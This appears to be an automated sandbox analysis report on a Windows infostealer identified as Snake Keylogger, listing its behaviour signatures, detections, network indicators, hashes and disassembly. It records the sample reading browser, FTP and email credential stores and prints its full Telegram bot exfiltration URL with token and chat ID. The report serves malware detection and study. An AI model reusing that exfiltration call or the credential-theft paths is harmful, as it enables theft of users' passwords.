                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C65587 LdrInitializeThunk,0_2_00C65587
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0OZQi3b0tM.exe, u003b?u058f??/?u0040???.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 0OZQi3b0tM.exe, ufffd?jkufffd/?????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, ufffd?jkufffd/?????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, ufffd?jkufffd/?????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Users\user\Desktop\0OZQi3b0tM.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTR
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Command and Scripting Interpreter
                Path InterceptionPath Interception1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Process Discovery
                Remote Services1
                Email Collection
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Native API
                Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Remote System Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information
                Security Account Manager1
                System Network Configuration Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                Automated Exfiltration1
                Ingress Tool Transfer
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS13
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits14
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                0OZQi3b0tM.exe73%VirustotalBrowse
                0OZQi3b0tM.exe49%MetadefenderBrowse
                0OZQi3b0tM.exe88%ReversingLabsByteCode-MSIL.Infostealer.Mintluks
                0OZQi3b0tM.exe100%AviraTR/ATRAPS.Gen
                0OZQi3b0tM.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                0.2.0OZQi3b0tM.exe.530000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                0.0.0OZQi3b0tM.exe.530000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                SourceDetectionScannerLabelLink
                checkip.dyndns.com0%VirustotalBrowse
                checkip.dyndns.org0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://api.telegram0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                https://api.telegram.orgD80%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  193.122.130.0
                  truetrueunknown
                  checkip.dyndns.org
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/true
                  • URL Reputation: safe
                  unknown
                  https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.telegram0OZQi3b0tM.exe, 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org40OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot0OZQi3b0tM.exefalse
                      high
                      http://api.telegram.org0OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0OZQi3b0tM.exe, 00000000.00000002.737020624.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://api.telegram.orgD80OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.org/q0OZQi3b0tM.exefalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=18560OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUfalse
                            193.122.130.0
                            checkip.dyndns.comUnited States
                            31898ORACLE-BMC-31898UStrue
                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:652382
                            Start date and time: 26/06/202209:31:062022-06-26 09:31:06 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 7s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:0OZQi3b0tM.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@4/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 0.5% (good quality ratio 0.5%)
                            • Quality average: 57.3%
                            • Quality standard deviation: 30.1%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 61
                            • Number of non-executed functions: 6
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Adjust boot time
                            • Enable AMSI
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, licensing.mp.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            09:32:26API Interceptor2x Sleep call for process: 0OZQi3b0tM.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            149.154.167.220Inquiry.exeGet hashmaliciousBrowse
                              SWIFT.exeGet hashmaliciousBrowse
                                SecuriteInfo.com.W32.AIDetectNet.01.32445.exeGet hashmaliciousBrowse
                                  Quote - QTY569008006.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.W32.AIDetectNet.01.9938.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.W32.AIDetectNet.01.16376.exeGet hashmaliciousBrowse
                                        doc202206230400400302202.exeGet hashmaliciousBrowse
                                          UPDATED SOA.exeGet hashmaliciousBrowse
                                            love.exeGet hashmaliciousBrowse
                                              Halkbank_Ekstre_230622_073809_405251.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.VHO.Trojan.Win32.Shelsy.gen.29715.exeGet hashmaliciousBrowse
                                                  T3yEmiknvv.exeGet hashmaliciousBrowse
                                                    gqyMDfZZ4K.exeGet hashmaliciousBrowse
                                                      INV 1337.exeGet hashmaliciousBrowse
                                                        UCBank98765433456789987654.exeGet hashmaliciousBrowse
                                                          RFQ 10050395.exeGet hashmaliciousBrowse
                                                            hesap ekstresi_22-06-2022.doc.exeGet hashmaliciousBrowse
                                                              PO-2023831.exeGet hashmaliciousBrowse
                                                                scan 100928272.exeGet hashmaliciousBrowse
                                                                  Pagamento SEPA_tansfer_220622_Swift.exeGet hashmaliciousBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    api.telegram.orgInquiry.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SWIFT.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.32445.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Quote - QTY569008006.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.9938.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.16376.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    doc202206230400400302202.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Lanskoy.exe.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    UPDATED SOA.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    love.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Halkbank_Ekstre_230622_073809_405251.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.VHO.Trojan.Win32.Shelsy.gen.29715.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    T3yEmiknvv.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    gqyMDfZZ4K.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    INV 1337.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    UCBank98765433456789987654.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    RFQ 10050395.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    hesap ekstresi_22-06-2022.doc.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    PO-2023831.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    scan 100928272.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    TELEGRAMRU70Ac7SgkUW.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.99
                                                                    SWosEtYBme.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.99
                                                                    Inquiry.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SWIFT.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Ox35UIhSO5.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.99
                                                                    sgjZTw5PWl.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.99
                                                                    Jke5jTAlnV.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.99
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.32445.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Quote - QTY569008006.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.9938.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.16376.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    doc202206230400400302202.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    UPDATED SOA.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    love.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Halkbank_Ekstre_230622_073809_405251.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.VHO.Trojan.Win32.Shelsy.gen.29715.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    T3yEmiknvv.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    gqyMDfZZ4K.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    buildz.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.99
                                                                    INV 1337.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0eStart.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    UniMod+.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    UniMod+.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Nitro Gen 6.6v.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    QuotationCatalogProduct.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Swift Copy.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Cnxsc.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    New Europe RFQ & Samples for June-2022_Purchase_0622.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    https://app.newsatme.com/emt/ses/814/66gez683byi01p3j04k172i1212507077212db45/click?url=https%3A%2F%2Flnkd%2Ein%2Fezmxaa%2DR%23BI5R6zr3!terminal41@carrytransit.com&3LKSJ21TE_Z65463UVZ0J3NGZBSE&c=E,1,hCIjm9RGTSK_i7GXlLBSe7dS3wCMh8SLOLaO3NpTZVwu8LTWyCRRZ3zyGwibv-5y8YSV_DOoqF56AVXYFRY1mEseE-Jh4O-mBgbwdSDPlFhv7od8dgXVJ5OwC6s,&typo=1Get hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Inquiry.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SWIFT.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    File.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.32445.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Ouicbvpfj.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    Quote - QTY569008006.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    New RFQ & Samples for June-2022_Purchases_0622.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.9938.exeGet hashmaliciousBrowse
                                                                    • 149.154.167.220
                                                                    No context
                                                                    No created / dropped files found
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.825310298922626
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                    File name:0OZQi3b0tM.exe
                                                                    File size:129537
                                                                    MD5:a90c091abded4a4f763de7537f569167
                                                                    SHA1:9394b05c2d518ee5d75fb030f2dca6d15c44bf0a
                                                                    SHA256:653b29296dcc50bfb59898d3ba38748b1c484701079ccc85f45bd2c0e4ecbe3e
                                                                    SHA512:c79ec6d2af2b415d706c501ec746db4f535c74699382e1ccb72490b5b9153ed8c0b527bec61cce09ae2fbcc934c7b212ff101c0e447f7051bfc26c4120b7e4c4
                                                                    SSDEEP:3072:gFlAi/smc7Rkw3HTCnnnnnnnnnnnnnnnnnn9b8GOswBn7FbY8:crkIb4hbN
                                                                    TLSH:E5C3061D3BF88904E6FE8A7306B14211CBB5F952095ACD1D1AC1F8592A7D780DE1BFA3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....hb..............P.................. ... ....@.. .......................`............@................................
                                                                    Icon Hash:00828e8e8686b000
                                                                    Entrypoint:0x42039e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x626883A2 [Tue Apr 26 23:43:30 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
